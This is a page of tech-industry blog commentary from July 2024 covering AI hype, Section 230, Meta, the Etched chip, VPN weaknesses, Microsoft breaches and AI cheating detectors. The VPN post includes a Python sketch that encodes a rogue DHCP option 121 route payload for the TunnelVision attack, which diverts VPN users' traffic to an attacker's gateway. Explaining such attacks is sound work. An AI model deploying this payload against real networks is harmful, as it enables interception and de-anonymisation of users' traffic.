Satire or Marketing: Let Smart Software Decide

July 3, 2024

This essay is the work of a dumb dinobaby. No smart software required.

What’s PhD level intelligence? In 1962, I had a required class in one of the -ologies. I vaguely remember that my classmates and I had to learn about pigeons, rats, and people who would make decisions that struck me as off the wall. The professor was named after a Scottish family from the Highlands. I do recall looking up the name and finding that it meant “crooked nose.” But the nose, as nice as it was, was nothing to the bed springs the good professor suspended from a second story window. I asked him, “What’s the purpose of the bed springs?” (None of the other students in the class cared, but I found the sight interesting.) His reply was, “I am using it as an antenna.” Okay, that is one example of PhD-level intelligence. I have encountered others, but I will not regale you with their somewhat idiosyncratic behaviors.

The illustration demonstrates the common sense approach to problem solving. Thanks, MSFT Copilot. Chugging away on Recall and security over the holiday. Yep, I bet you are.

Why am I thinking about a story about bedsprings suspended from a second story window? I just read “ChatGPT Now Has PhD Level Intelligence, and the Poor Personal Choices to Prove It.” The write up states:

ChatGPT has become indispensable to plagiarists and spambots worldwide. Now, OpenAI is thrilled to introduce ChatGPT 5.0, the most advanced version of the popular virtual assistant to date. With groundbreaking improvements, GPT-5 is like having a doctor of philosophy right at your fingertips.

The write up (in a humorous vein, I really hope) identifies some characteristics of the next big thing from Sam AI-Man, the Apple partner (he hopes). The article suggests that ChatGPT 5 would cherish a saloon mug with this snappy phrase printed on the container:

Suck it up, liver.

No, I don’t want the mug, nor have I abused my liver as an undergraduate. I actually enjoyed spending time in the so-called university’s library.

The write up includes a short commentary about the ethical concerns or guardrails Sam AI-Man has on the Information Highway populated with smart vehicles and presumably less smart humans who are confident the zeros and ones don’t get scrambled:

Numerous questions have arisen regarding the ethics and legality of training ChatGPT on copyrighted text data without permission. In this latest version, however, reliance on authors’ intellectual property has been dramatically reduced. While GPT-5 started training from a knowledge base of millions of texts, it got around to reading only Frankenstein, plus maybe half of a Donna Haraway book. It basically bluffed its way through prelims by talking about “embodiment” a lot.

I get the Mary Shelley reference. But Donna Haraway forced me to ask Claude Sonnet 3.5, “Please, explain Donna Haraway’s contribution to ethical discourse.” Here’s what I received from the smart system competing with Sam AI-Man’s presumably smarter system:

Here’s Donna Haraway’s contribution to ethical discourse in three sentences:

  1. Donna Haraway challenged traditional ideas about what it means to be human by introducing the concept of a “cyborg” – a blend of human and machine.
  2. She argued that the lines between nature and culture, human and animal, and physical and non-physical are not as clear as we think, which forces us to rethink our ethical responsibilities.
  3. Her work encourages us to consider how technology and science affect our understanding of ourselves and our relationships with other living things, pushing us to develop new ethical frameworks for our changing world.

Thank you, Claude Sonnet 3.5! I have stated that my IQ score pegs me in the “Dumb Cod” percentile. I think Ms. Haraway is into the Ray Kurzweil and Elon Musk concept space. I know I am looking forward to nanodevices able to keep me alive for many, many years. I want to poke fun at smart software, and I quite like to think about PhD level software.

To close, I want to quote the alleged statement of a very smart person who could not remember if OpenAI used YouTube-type content to train ChatGPT. (Hey, even crooked nose remembered that he suspended the bed springs to function like an antenna.) The CTO of OpenAI allegedly said:

“If you look at the trajectory of improvement, systems like GPT-3 were maybe toddler-level intelligence… and then systems like GPT-4 are more like smart high-schooler intelligence. And then, in the next couple of years, we’re looking at PhD intelligence…” — OpenAI CTO Mira Murati, in an interview with Dartmouth Engineering

I wonder if a person without a PhD can recognize “PhD intelligence”? Sure. Why not? It’s marketing.

Stephen E Arnold, July 3, 2024

Can Big Tech Monopolies Get Worse?

July 3, 2024

Monopolies are bad. They’re horrible for consumers because of high prices, exploitation, and control of resources. They also kill innovation, control markets, and influence politics. A monopoly is only good when it is a reference to the classic board game (even that’s questionable because the game is known to ruin relationships). Legendary tech and fiction writer Cory Doctorow explains that technology companies want to maintain their stranglehold on the economy, industry, and world in an article for the Electronic Frontier Foundation (EFF): “Wanna Make Big Tech Monopolies Even Worse? Kill Section 230.”

Doctorow makes a humorous observation, referencing Dante, that there’s a circle in Hell worse than being forced to choose a side in a meaningless online flame war. What’s that circle? It’s being threatened with a lawsuit for refusing or complying with one party over another. EFF protects civil liberties on the Internet and in the digital world. It’s been around since 1990, so the EFF team is very familiar with the poor behavior that plagues the Internet. Their first hire was the man who coined Godwin’s Law.

EFF loves Section 230 because it protects people who run online services from being sued by their users. Lawsuits are horrible, time-consuming, and expensive. The Internet is chock full of people who will sue at the stroke of a keyboard. There’s a potential bill that would kill Section 230:

“That’s why we were so alarmed to see a bill introduced in the House Energy and Commerce Committee that would sunset Section 230 as of December 31, 2025, with no provision to protect online service providers from being conscripted into their users’ online disputes and the legal battles that arise from them.

Homely places on the internet aren’t just a curiosity anymore, nor are they merely a hangover from the Web 1.0 era.

In an age of resurgent anti-monopoly activism, small online communities, either standing on their own, or joined in loose “federations,” are the best chance we have to escape Big Tech’s relentless surveillance and clumsy, unaccountable control.”

If Section 230 is destroyed, it will pit big tech companies with their deep pockets against the average user. Big Tech could sue whomever it wanted, and the change would allow bad actors, including scammers, war criminals, and dictators, to silence their critics. It would also prevent any alternatives to big tech from emerging.

So big tech could get worse, although it is already very bad: kids addicted to screens, misinformation, CSAM, privacy violations, and monopolistic behavior. Maybe we should roll over and hide beneath a rock, with an Apple tracker stuck to it, of course.

Whitney Grace, July 3, 2024

Another Open Source AI Voice Speaks: Yo, Meta!

July 3, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

The open source versus closed source software debate ebbs and flows. Like the “go fast” and “go slow” camps in AI, strong opinions suggest that big money and power are swirling like the storms on a weather app for Oklahoma in tornado season. The most recent EF5 is captured in “Zuckerberg Disses Closed-Source AI Competitors As Trying to Create God.” The US government seems to be concerned about open source smart software finding its way into the hands of those who are not fans of George Washington-type thinking.

Which AI philosophy will win the big pile of money? Team Blue representing the Zuck? Or, the rag tag proprietary wizards? Thanks, MSFT Copilot. You are into proprietary, aren’t you?

The “move fast and break things” personage of Mark Zuckerberg is into open source smart software. In the write up, he allegedly said in a YouTube bit:

“I don’t think that AI technology is a thing that should be kind of hoarded and … that one company gets to use it to build whatever central, single product that they’re building,” Zuckerberg said in a new YouTube interview with Kane Sutter (@Kallaway).

The write up includes this passage:

In the conversation, Zuckerberg said there needs to be a lot of different AIs that get created to reflect people’s different interests.

One interesting item in the article, in my opinion, is this:

“You want to unlock and … unleash as many people as possible trying out different things,” he continued. “I mean, that’s what culture is, right? It’s not like one group of people getting to dictate everything for people.”

But the killer Meta vision is captured in this passage:

Zuckerberg said there will be three different products ahead of convergence: display-less smart glasses, a heads-up type of display and full holographic displays. Eventually, he said that instead of neural interfaces connected to their brain, people might one day wear a wristband that picks up signals from the brain communicating with their hand. This would allow them to communicate with the neural interface by barely moving their hand. Over time, it could allow people to type, too. Zuckerberg cautioned that these types of inputs and AI experiences may not immediately replace smartphones, though. “I don’t think, in the history of technology, the new platform — it usually doesn’t completely make it that people stop using the old thing. It’s just that you use it less,” he said.

In short, the mobile phone is going down, not tomorrow, but definitely to the junk drawer.

Several observations which I know you are panting to read:

  1. Never underestimate making something small or re-inventing it as a different form factor. The Zuck might be “right.”
  2. The idea of “unleash” is interesting. What happens if employees at WhatsApp unleash themselves? How will the Zuck construct react? Like the Google? Something new like blue chip consulting firms replacing people with smart software? “Unleash” can be interpreted in different ways, but I am thinking of turning loose a pack of hyenas. The Zuck may be thinking about eager kindergartners. Who knows?
  3. The Zuck’s position is different from the government officials who are moving toward restrictions on “free and open” smart software. Those hallucinating large language models can be repurposed into smart weapons. Close enough for horseshoes with enough RDX may do the job.

Net net: The Zuck is an influential and very powerful information channel owner. “Unleash” what? Hungry predators or those innovating children? Perhaps neither. But as OpenAI seems to be closing, the Zuck AI is into opening. Ah, uncertainty is unfolding before my eyes in real time.

Stephen E Arnold, July 3, 2024

Scale Is All You Need for Superintelligence: Interesting Assertion

July 2, 2024

This essay is the work of a dumb dinobaby. No smart software required. This blog post includes information from Claude 3.5 Sonnet. The information from smart software is in blue.

At this time, smart software boils down to the “transformer.” I navigated to Claude 3.5 Sonnet and asked the smart software to explain “transformer.” Here’s what the system generated:

The Google Transformer innovation, introduced in 2017, revolutionized natural language processing by introducing a novel architecture that relies entirely on attention mechanisms. This approach allows the model to process input sequences in parallel, rather than sequentially, leading to significant improvements in translation quality and training efficiency. The Transformer’s key features include self-attention, which enables it to capture relationships between words regardless of their position in a sentence, and positional encoding, which helps the model understand word order without relying on recurrent neural networks.
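
For the curious, Claude’s description maps onto a few lines of numpy. The sketch below is a toy, single-head version under my own assumptions (random placeholder weight matrices, no positional encoding, no learned parameters); it is not Google’s code, just the core scaled dot-product attention arithmetic the quote describes:

```python
import numpy as np

def self_attention(X, Wq, Wk, Wv):
    """Scaled dot-product self-attention over one sequence of token vectors."""
    Q, K, V = X @ Wq, X @ Wk, X @ Wv             # project tokens to queries/keys/values
    scores = Q @ K.T / np.sqrt(K.shape[-1])      # every position scores every other position
    weights = np.exp(scores - scores.max(axis=-1, keepdims=True))
    weights /= weights.sum(axis=-1, keepdims=True)   # row-wise softmax
    return weights @ V                           # each output mixes all positions in parallel

rng = np.random.default_rng(0)
seq_len, d_model = 5, 8                          # 5 tokens, 8-dimensional embeddings
X = rng.normal(size=(seq_len, d_model))
Wq, Wk, Wv = (rng.normal(size=(d_model, d_model)) for _ in range(3))
print(self_attention(X, Wq, Wk, Wv).shape)       # (5, 8): one attended vector per token
```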

I then asked, “Are there other ways to achieve smart software or AI information functions?” Claude 3.5 Sonnet spit out this list:

  1. Machine Learning Algorithms
  2. Expert Systems
  3. Neural Networks

Options are good. But the buzz focuses on transformers, a Google “invention” allegedly a decade old (though some suggest its roots reach back into the mists of time). Let’s stick with the Google and a decade.

The future is on the horizon. Thanks, MSFT Copilot. Good enough and you spelled “future” correctly.

“Etched Is Making the Biggest Bet in AI.” That is an interesting statement. The company states what its chip is not:

By burning the transformer architecture into our chip, we can’t run most traditional AI models: the DLRMs powering Instagram ads, protein-folding models like AlphaFold 2, or older image models like Stable Diffusion 2. We can’t run CNNs, RNNs, or LSTMs either. But for transformers, Sohu is the fastest chip of all time.

What does the chip do? The company says:

With over 500,000 tokens per second in Llama 70B throughput, Sohu lets you build products impossible on GPUs. Sohu is an order of magnitude faster and cheaper than even NVIDIA’s next-generation Blackwell (B200) GPUs.

The company again points out the downside of its “bet the farm” approach:

Today, every state-of-the-art AI model is a transformer: ChatGPT, Sora, Gemini, Stable Diffusion 3, and more. If transformers are replaced by SSMs, RWKV, or any new architecture, our chips will be useless.

Yep, useless.

What is Etched’s big concept? The company says:

Scale is all you need for superintelligence.

This means, in my dinobaby-impaired understanding, that big delivers smarter smart software. Skip the power, pipes, and pings. Just scale everything. The company agrees:

By feeding AI models more compute and better data, they get smarter. Scale is the only trick that’s continued to work for decades, and every large AI company (Google, OpenAI / Microsoft, Anthropic / Amazon, etc.) is spending more than $100 billion over the next few years to keep scaling.

Because existing chips are “hitting a wall,” a number of companies are in the smart software chip business. The write up mentions 12 of them, and I am not sure the list is complete.

Etched is different. The company asserts:

No one has ever built an algorithm-specific AI chip (ASIC). Chip projects cost $50-100M and take years to bring to production. When we started, there was no market.

The company walks through the problems of existing chips and delivers its knockout punch:

But since Sohu only runs transformers, we only need to write software for transformers!

Reduced coding and an optimized chip: Superintelligence is in sight. Does the company want you to write a check? Nope. Here’s the wrap up for the essay:

What happens when real-time video, calls, agents, and search finally just work? Soon, you can find out. Please apply for early access to the Sohu Developer Cloud here. And if you’re excited about solving the compute crunch, we’d love to meet you. This is the most important problem of our time. Please apply for one of our open roles here.

What’s the timeline? I don’t know. What’s the cost of an Etched chip? I don’t know. What’s the infrastructure required? I don’t know. But superintelligence is almost here.

Stephen E Arnold, July 2, 2024

Will Google Charge for AI Features? Of Course

July 2, 2024

Will AI spur Google to branch out from its ad-revenue business model? Possibly, Dataconomy concludes in, “AI Is Draining Google’s Money and We May Be Charged for It.” Writer Eray Eliaçık cites reporting from the Financial Times when stating:

“Google, the search engine used by billions, is considering charging for special features made possible by artificial intelligence (AI). This would be different from its usual practice of offering most of its services for free. Here’s what this could mean: Google might offer some cool AI-driven tools, like a smarter assistant or personalized search options, but only to those who pay for them. The regular Google search would stay free, but these extra features would come with a price tag, such as Gemini, SGE, and Image generation with AI and more.”

Would Google really make more money charging for AI than serving up ads alongside it? Perhaps it will do both?

Eliaçık reminds us AI is still far from perfect. There are several reasons he does not address:

  1. Google faces a challenge to maintain its ad monopolies as investigations into its advertising business, which has been running without interference for more than two decades, move forward.
  2. AI is likely to be a sector with a big dog, a couple of mid-sized dogs, and a bunch of French bulldogs (overvalued and stubborn). Google wants to be the winner because it invented the transformer and now has to deal with the consequences of that decision. Some of the pretenders are likely to be really big dogs and capable of tearing off Googzilla’s tail.
  3. Cost control is easy to talk about in MBA class and financial columns. In real online life, cost control is a thorny problem. No matter how much the bean counters squeeze, the costs of new gear, innovation, and fixing stuff when it flames out over the weekend blasts many IT budgets into orbit. Yep, even Google’s wizards face this problem.

Net net: Google will have little choice but to find a way to monetize clicks, eyeballs, customer service, cloud access, storage, and anything else that can be slapped with a price tag. Take that to MBA class.

Cynthia Murrell, July 2, 2024

VPNs, Snake Oil, and Privacy

July 2, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Earlier this year, I had occasion to meet a wild and crazy entrepreneur who told me that he had the next big thing in virtual private networks. I listened to the words and tried to convert the brightly-colored verbal storm into something I could understand. I failed. The VPN, as I recall the Energizer-bunny-powered start-up impresario explaining, needed to be reinvented.

Source: https://www.leviathansecurity.com/blog/tunnelvision

I knew that the individual’s knowledge of VPNs was — how shall I phrase it — limited. As an educational outreach, I forwarded to the person who wants to be really, really rich the article “Novel Attack against Virtually All VPN Apps Neuters Their Entire Purpose.” The write up focuses on an exploit which compromises the “secrecy” the VPN user desires. I hoped the serial entrepreneur would note this passage:

“The attacker can read, drop or modify the leaked traffic and the victim maintains their connection to both the VPN and the Internet.”

Technical know-how is required to pull off the attack, but the larger point is that VPN services are often designed to:

  1. Capture data about the VPN user and other quite interesting metadata. These data are then used for marketing, search engine optimization, or simple information monitoring.
  2. Extract from a VPN-hungry customer a credit card number which can be billed every month for a long, long time. The customer believes a VPN adds security when zipping around from Web site to online service. Ignorance is bliss, and these VPN customers are usually happy.
  3. Feed a large-scale industrial operation which sells VPN services to repackagers who buy bulk VPN bandwidth and sell it high. The winner is the “enabler” or specialized hosting provider who delivers a vanilla VPN service on the cheap and ignores what the resellers say and do. At one of the law enforcement / intel conferences I attended, I heard someone mention the name of an ISP in Romania. I think the name of this outfit was M247 or something similar. Is this a large-scale VPN utility? I don’t know, but I may take a closer look because Romania is an interesting country with some interesting online influencers who are often in the news.

The write up includes quite a bit of technical detail. There is one interesting factoid that I took care to highlight for the VPN-oriented entrepreneur:

Interestingly, Android is the only operating system that fully immunizes VPN apps from the attack because it doesn’t implement option 121. For all other OSes, there are no complete fixes. When apps run on Linux there’s a setting that minimizes the effects, but even then TunnelVision can be used to exploit a side channel that can be used to de-anonymize destination traffic and perform targeted denial-of-service attacks. Network firewalls can also be configured to deny inbound and outbound traffic to and from the physical interface. This remedy is problematic for two reasons: (1) a VPN user connecting to an untrusted network has no ability to control the firewall and (2) it opens the same side channel present with the Linux mitigation. The most effective fixes are to run the VPN inside of a virtual machine whose network adapter isn’t in bridged mode or to connect the VPN to the Internet through the Wi-Fi network of a cellular device.

What’s this mean? In a nutshell, Google did something helpful. By design or by accident? I don’t know. You pick the option that matches your perception of the Android mobile operating system.

This passage includes one of those observations which could be helpful to the aspiring bad actor: run the VPN inside a virtual machine and connect to the Internet via a Wi-Fi network or mobile cellular service.
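
For readers who want mechanics rather than warnings, here is a small Python sketch of the payload side of the trick: an RFC 3442 “classless static route” list, the data a rogue DHCP server stuffs into option 121. Two /1 routes cover the entire IPv4 space and, being more specific than the VPN’s single 0.0.0.0/0 default route, win the routing decision. The addresses are made up for illustration; this is my sketch, not code from the researchers:

```python
import ipaddress
import math

def encode_option_121(routes):
    """Encode (destination_cidr, gateway) pairs as an RFC 3442 classless
    static route list -- the payload a rogue DHCP server puts in option 121."""
    payload = bytearray()
    for cidr, gateway in routes:
        net = ipaddress.ip_network(cidr)
        payload.append(net.prefixlen)                    # 1 byte: prefix length
        significant = math.ceil(net.prefixlen / 8)       # only significant octets are sent
        payload += net.network_address.packed[:significant]
        payload += ipaddress.ip_address(gateway).packed  # 4 bytes: next-hop router
    return bytes(payload)

# Hypothetical attacker gateway on the local network. Two /1 routes beat the
# VPN's 0.0.0.0/0 route because more-specific prefixes win the route lookup.
attacker_gw = "192.168.1.254"
blob = encode_option_121([("0.0.0.0/1", attacker_gw), ("128.0.0.0/1", attacker_gw)])
print(blob.hex())  # raw option 121 bytes the DHCP client would install as routes
```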

Several observations are warranted:

  1. The idea of a “private network” is not new. A good question to pose is, “Is there a way to create a private network that cannot be detected using conventional traffic monitoring and sniffing tools?” Could that be the next big thing for some online services designed for bad actors?
  2. The lack of knowledge about VPNs makes it possible for data harvesters and worse to offer free or low cost VPN service and bilk some customers out of their credit card data and money.
  3. Bad actors are — at some point — going to invest time, money, and programming resources in developing a method to leapfrog the venerable and vulnerable VPN. When that happens, excitement will ensue.

Net net: Is there a solution to VPN trickery? Sure, but that involves many moving parts. I am not holding my breath.

Stephen E Arnold, July 2, 2024

The Check Is in the Mail and I Will Love You in the Morning. I Promise.

July 1, 2024

This essay is the work of a dumb dinobaby. No smart software required.

Have you heard these phrases in a business context?

  • “I’ll get back to you on that”
  • “We should catch up sometime”
  • “I’ll see what I can do”
  • “I’m swamped right now”
  • “Let me check my schedule and get back to you”
  • “Sounds great, I’ll keep that in mind”

Thanks, MSFT Copilot. Good enough despite the mobile presented as a corded landline connected to a bank note. I understand and I will love you in the morning. No, really.

I read “It’s Safe to Update Your Windows 11 PC Again, Microsoft Reassures Millions after Dropping Software over Bug.” [If the linked article disappears, I would not be surprised.] The write up says:

Due to the severity of the glitch, Microsoft decided to ditch the roll-out of KB5039302 entirely last week. Since then, the Redmond-based company has spent time investigating the cause of the bug and determined that it only impacts those who use virtual machine tools, like CloudPC, DevBox, and Azure Virtual Desktop. Some reports suggest it affects VMware, but this hasn’t been confirmed by Microsoft.

Now the glitch has been remediated. Yes, “I’ll get back to you on that.” Okay, I am back:

…on the first sign that your Windows PC has started — usually a manufacturer’s logo on a blank screen — hold down the power button for 10 seconds to turn-off the device, press and hold the power button to turn on your PC again, and then when Windows restarts for a second time hold down the power button for 10 seconds to turn off your device again. Power-cycling twice back-to-back should means that you’re launched into Automatic Repair mode on the third reboot. Then select Advanced options to enter winRE. Microsoft has in-depth instructions on how to best handle this damaging bug on its forum.

No problem, grandma.

I read this reassurance about the simple steps needed to get the old Windows 11 gizmo working again. Then I noted this article in my newsfeed this morning (July 1, 2024): “Microsoft Notifies More Customers Their Emails Were Accessed by Russian Hackers.” This write up reports as actual factual this Microsoft announcement:

Microsoft has told more customers that their emails were compromised during a late 2023 cyberattack carried out by the Russian hacking group Midnight Blizzard.

Yep, Russians… again. The write up explains:

The attack began in late November 2023. Despite the lengthy period the attackers were present in the system, Microsoft initially insisted that only a “very small percentage” of corporate accounts were compromised. However, the attackers managed to steal emails and attached documents during the incident.

I can hear in the back of my mind this statement: “I’ll see what I can do.” Okay, thanks.

This somewhat interesting revelation about an event chugging along unfixed since late 2023 has annoyed some other people, not your favorite dinobaby. The article concluded with this passage:

In April [2024], a highly critical report [pdf] by the US Cyber Safety Review Board slammed the company’s response to a separate 2023 incident where Chinese hackers accessed emails of high-profile US government officials. The report criticized Microsoft’s “cascade of security failures” and a culture that downplayed security investments in favor of new products. “Microsoft had not sufficiently prioritized rearchitecting its legacy infrastructure to address the current threat landscape,” the report said. The urgency of the situation prompted US federal agencies to take action in April [2024]. An emergency directive was issued by the US Cybersecurity and Infrastructure Security Agency (CISA), mandating government agencies to analyze emails, reset compromised credentials, and tighten security measures for Microsoft cloud accounts, fearing potential access to sensitive communications by Midnight Blizzard hackers. CISA even said the Microsoft hack posed a “grave and unacceptable risk” to government agencies.

“Sounds great, I’ll keep that in mind.”

Stephen E Arnold, July 1, 2024

Is There a Problem with AI Detection Software?

July 1, 2024

Of course not.

But colleges and universities are struggling to contain AI-enabled cheating. Sadly, it seems the easiest solution is tragically flawed. Times Higher Education considers, “Is it Time to Turn Off AI Detectors?” The post shares a portion of the new book, “Teaching with AI: A Practical Guide to a New Era of Human Learning” by José Antonio Bowen and C. Edward Watson. The excerpt begins by looking at the problem:

“The University of Pennsylvania’s annual disciplinary report found a seven-fold (!) increase in cases of ‘unfair advantage over fellow students’, which included ‘using ChatGPT or Chegg’. But Quizlet reported that 73 per cent of students (of 1,000 students, aged 14 to 22 in June 2023) said that AI helped them ‘better understand material’. Watch almost any Grammarly ad (ubiquitous on TikTok) and ask first, if you think clicking on ‘get citation‘ or ‘paraphrase‘ is cheating. Second, do you think students might be confused?”

Probably. Some universities are not exactly clear on what is cheating and what is permitted usage of AI tools. At the same time, a recent study found 51 percent of students will keep using them even if they are banned. The boost to their GPAs is just too tempting. Schools’ urge to fight fire with fire is understandable, but detection tools are far from perfect. We learn:

“AI detectors are already having to revise claims. Turnitin initially claimed a 1 per cent false-positive rate but revised that to 4 per cent later in 2023. That was enough for many institutions, including Vanderbilt, Michigan State and others, to turn off Turnitin’s AI detection software, but not everyone followed their lead. Detectors vary considerably in their accuracy and rate of false positives. One study looked at 14 different detectors and found that five of the 14 were only 50 per cent accurate or worse, but four of them (CheckforAI, Winston AI, GPT-2 Output and Turnitin) missed only one of the 18 AI-written samples. Detectors are not all equal, but the best are better than faculty at identifying AI writing.”

But is that ability worth the false positives? One percent may seem small, but to those students it can mean an end to their careers before they even begin. For institutions that do not want to risk false accusations, the authors suggest several alternatives that seem to make a difference. They advise instructors to discuss the importance of academic integrity at the beginning of the course and again as the semester progresses. Demonstrating how well detection tools work can also have an impact. Literally quizzing students on the school’s AI policies, definitions, and consequences can minimize accidental offenses. Schools could also afford students some wiggle room: allow them to withdraw submissions and take the zero if they have second thoughts. Finally, the authors suggest schools normalize asking for help. If students get stuck, they should feel they can turn to a human instead of AI.
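
The false-positive arithmetic a few sentences back is easy to check. A back-of-the-envelope sketch, with the essay volume an assumption of mine and the rates the ones quoted above:

```python
# How many innocent students get flagged? The false-positive rates are
# Turnitin's initial claim (1%) and its 2023 revision (4%); the essay count
# is an assumed volume for a mid-sized institution, not a figure from the book.
essays_from_honest_students = 10_000
for fp_rate in (0.01, 0.04):
    wrongly_flagged = essays_from_honest_students * fp_rate
    print(f"{fp_rate:.0%} false-positive rate -> {wrongly_flagged:.0f} wrongful flags")
# 1% -> 100 students; 4% -> 400 students, each facing a misconduct case.
```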

Cynthia Murrell, July 1, 2024

OpenAI: Do You Know What Open Means? Does Anyone?

July 1, 2024

This essay is the work of a dumb dinobaby. No smart software required.

The backstory for OpenAI was the concept of “open.” Well, the meaning of “open” has undergone some modification. There was a Musk up, a board coup, an Apple announcement that was vaporous, and now we arrive at the word “open” as in “OpenAI.”

Open source AI is like a barn that burned down. Hopefully the companies losing their software’s value have insurance. Once the barn is gone, those valuable animals may be gone. Thanks, MSFT Copilot. Good enough. How’s that Windows update going this week?

“OpenAI Taking Steps to Block China’s Access to Its AI Tools” reports with the same authority Bloomberg used with its “your motherboard is phoning home” crusade a few years ago [Note: If the link doesn’t render, search Bloomberg for the original story]:

OpenAI is taking additional steps to curb China’s access to artificial intelligence software, enforcing an existing policy to block users in nations outside of the territory it supports. The Microsoft Corp.-backed startup sent memos to developers in China about plans to begin blocking their access to its tools and software from July, according to screenshots posted on social media that outlets including the Securities Times reported on Tuesday. In China, local players including Alibaba Group Holding Ltd. and Tencent Holdings Ltd.-backed Zhipu AI posted notices encouraging developers to switch to their own products.

Let’s assume the information in the cited article is on the money. Yes, I know this is risky today, but do you know an 80-year-old who is not into thrills and spills?

According to Claude 3.5 Sonnet (which my team is testing), “open” means:

  • Not closed or fastened
  • Accessible or available
  • Willing to consider or receive
  • Exposed or vulnerable

The Bloomberg article includes this passage:

OpenAI supports access to its services in dozens of countries. Those accessing its products in countries not included on the list, such as China, may have their accounts blocked or suspended, according to the company’s guidelines.  It’s unclear what prompted the move by OpenAI. In May, Sam Altman’s startup revealed it had cut off at least five covert influence operations in past months, saying they were using its products to manipulate public opinion.

I found this “real” news interesting:

From Baidu Inc. to startups like Zhipu, Chinese firms are trying to develop AI models that can match ChatGPT and other US industry pioneers. Beijing is openly encouraging local firms to innovate in AI, a technology it considers crucial to shoring up China’s economic and military standing.

It seems to me that “open” means closed.

Another angle surfaces in Nature’s article “Not All Open Source AI Models Are Actually Open: Here’s a Ranking.” OpenAI is not alone in doing some linguistic shaping with the word “open.” The Nature article states:

Technology giants such as Meta and Microsoft are describing their artificial intelligence (AI) models as ‘open source’ while failing to disclose important information about the underlying technology, say researchers who analysed a host of popular chatbot models. The definition of open source when it comes to AI models is not yet agreed, but advocates say that ’full’ openness boosts science, and is crucial for efforts to make AI accountable.

Now this sure sounds to me as if the European Union is defining “open” as different from the “open” of OpenAI.

Let’s step back.

Years ago I wrote a monograph about open source search. At that time IDC was undergoing what might charitably be called “turmoil.” Chapters of my monograph were published by IDC on Amazon. I recycled the material for consulting engagements, but I learned three useful things in the research for that analysis of open source search systems:

  1. Those making open source search systems available as free and open source software wanted the software [a] to prove their programming abilities, [b] to be a foil for a financial play best embodied in the Elastic go-public-and-sell-services “play,” or [c] to be a low-cost, no-barrier runway to locking in users; that is, a big company funds the open source software and has a way to make money every which way from the “free” bait.
  2. Open source software is product testing and proof-of-concept work for developers who are without a job or who are taking a programming course at a university. I witnessed this approach when I lectured in Tallinn, Estonia, in the 2000s. The “maybe this will stick” approach yields some benefits, primarily to the big outfits who co-opt an open source project and support it. When the original developer gives up or gets a job, the big outfit has its hands on the controls. Please, see [c] in item 1 above.
  3. Open source was a baby buzzword when I was working on my open source search research project. Now “open source” is a full-scale, AI-jargonized road map to making money.

The current mix-up in the meaning of “open” is a direct result of people wearing suits realizing that software has knowledge value. Giving value away for nothing is not smart. Hence, the US government wants to stop its nemesis from having access to open source software, specifically AI. Big companies do not want proprietary knowledge to escape unless someone pays for the beast. Individual developers want to get some fungible reward for creating “free” software. Begging for dollars, offering a disabled version of software or crippleware, or charging for engineering “support” are popular ways to move from free to ka-ching. Big companies have another angle: Lock in. Some outfits are inept, like IBM with its fancy dancing around Red Hat. Other companies are more clever; for instance, Microsoft with its partners and AI investments, which allow “open” to become closed, thank you very much.

Like many eddies in the flow of the technology river, change is continuous. When someone says, “Open”, keep in mind that thing may be closed and have a price tag or handcuffs.

Net net: The AI secrets have flown the coop. It has taken about 50 years to reach peak AI. The new angles revealed in the last year are not heart stoppers. That smoking ruin over there? That’s the locked barn that burned down. Animals are gone or “transformed.”

Stephen E Arnold, July 1, 2024
